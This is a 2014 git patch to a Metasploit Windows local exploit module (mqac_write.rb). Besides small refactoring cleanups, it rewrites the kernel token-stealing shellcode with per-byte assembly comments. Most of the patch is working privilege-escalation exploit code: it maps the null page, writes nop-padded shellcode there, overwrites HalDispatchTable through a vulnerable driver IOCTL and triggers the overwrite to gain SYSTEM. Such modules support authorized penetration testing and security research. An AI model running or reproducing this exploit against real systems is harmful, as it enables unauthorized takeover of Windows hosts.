From 7f79e58e7fcaa07459ec491cc7dc701768550c6f Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Tue, 22 Jul 2014 14:45:00 -0400 Subject: [PATCH] Lots and cleanups based on PR feed back --- modules/exploits/windows/local/mqac_write.rb | 51 ++++++++++---------- 1 file changed, 26 insertions(+), 25 deletions(-) diff --git a/modules/exploits/windows/local/mqac_write.rb b/modules/exploits/windows/local/mqac_write.rb index 6a7fefdf3c..e878c18323 100644 --- a/modules/exploits/windows/local/mqac_write.rb +++ b/modules/exploits/windows/local/mqac_write.rb @@ -83,12 +83,13 @@ class Metasploit3 < Msf::Exploit::Local local_sys = resolve_sid("S-1-5-18") system_account_name = "#{local_sys[:domain]}\\#{local_sys[:name]}" + this_pid = session.sys.process.getpid # Processes that can Blue Screen a host if migrated in to dangerous_processes = ["lsass.exe", "csrss.exe", "smss.exe"] session.sys.process.processes.each do |p| # Check we are not migrating to a process that can BSOD the host next if dangerous_processes.include?(p["name"]) - next if p["pid"] == session.sys.process.getpid + next if p["pid"] == this_pid next if p["pid"] == 4 next if p["user"] != system_account_name return p @@ -136,7 +137,6 @@ class Metasploit3 < Msf::Exploit::Local return end - this_proc = session.sys.process.open kernel_info = find_sys_base(nil) base_addr = 0xffff print_status("Kernel Base Address: 0x#{kernel_info[0].to_s(16)}") @@ -144,11 +144,13 @@ class Metasploit3 < Msf::Exploit::Local handle = open_device return if handle.nil? - if not this_proc.memory.writable?(base_addr) - result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack("L"), nil, [ 0xffff ].pack("L"), "MEM_COMMIT|MEM_RESERVE", "PAGE_EXECUTE_READWRITE") + this_proc = session.sys.process.open + unless this_proc.memory.writable?(base_addr) + session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack("L"), nil, [ 0xffff ].pack("L"), "MEM_COMMIT|MEM_RESERVE", "PAGE_EXECUTE_READWRITE") end - if not this_proc.memory.writable?(base_addr) + unless this_proc.memory.writable?(base_addr) print_error('Failed to properly allocate memory') + this_proc.close return end @@ -160,34 +162,33 @@ class Metasploit3 < Msf::Exploit::Local halDispatchTable += kernel_info[0] print_status("HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}") - tokenstealing = "\x31\xc0" - tokenstealing << "\x52" - tokenstealing << "\x53" - tokenstealing << "\x33\xc0" - tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00" - tokenstealing << "\x8b\x40" + target['_KPROCESS'] - tokenstealing << "\x8b\xc8" - tokenstealing << "\x8b\x98" + target['_TOKEN'] + "\x00\x00\x00" - tokenstealing << "\x89\x1d\x00\x09\x02\x00" - tokenstealing << "\x8b\x80" + target['_APLINKS'] + "\x00\x00\x00" - tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00" - tokenstealing << "\x81\xb8" + target['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" - tokenstealing << "\x75\xe8" - tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00" - tokenstealing << "\x8b\xc1" - tokenstealing << "\x89\x90" + target['_TOKEN'] + "\x00\x00\x00" - tokenstealing << "\x5b" - tokenstealing << "\x5a" - tokenstealing << "\xc2\x10" + tokenstealing = "\x52" # push edx # Save edx on the stack + tokenstealing << "\x53" # push ebx # Save ebx on the stack + tokenstealing << "\x33\xc0" # xor eax, eax # eax = 0 + tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00" # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD + tokenstealing << "\x8b\x40" + target['_KPROCESS'] # mov eax, dword ptr [eax+44h] # Retrieve _KPROCESS + tokenstealing << "\x8b\xc8" # mov ecx, eax + tokenstealing << "\x8b\x98" + target['_TOKEN'] + "\x00\x00\x00" # mov ebx, dword ptr [eax+0C8h] # Retrieves TOKEN + tokenstealing << "\x8b\x80" + target['_APLINKS'] + "\x00\x00\x00" # mov eax, dword ptr [eax+88h] <====| # Retrieve FLINK from ActiveProcessLinks + tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00" # sub eax,88h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks + tokenstealing << "\x81\xb8" + target['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4 | # Compares UniqueProcessId with 4 (The System Process on Windows XP) + tokenstealing << "\x75\xe8" # jne 0000101e ====================== + tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00" # mov edx,dword ptr [eax+0C8h] # Retrieves TOKEN and stores on EDX + tokenstealing << "\x8b\xc1" # mov eax, ecx # Retrieves KPROCESS stored on ECX + tokenstealing << "\x89\x90" + target['_TOKEN'] + "\x00\x00\x00" # mov dword ptr [eax+0C8h],edx # Overwrites the TOKEN for the current KPROCESS + tokenstealing << "\x5b" # pop ebx # Restores ebx + tokenstealing << "\x5a" # pop edx # Restores edx + tokenstealing << "\xc2\x10" # ret 10h # Away from the kernel! shellcode = make_nops(0x200) + tokenstealing this_proc.memory.write(0x1, shellcode) + this_proc.close print_status("Triggering vulnerable IOCTL") session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0) result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4) - if not is_system? + unless is_system? print_error("Exploit failed") return end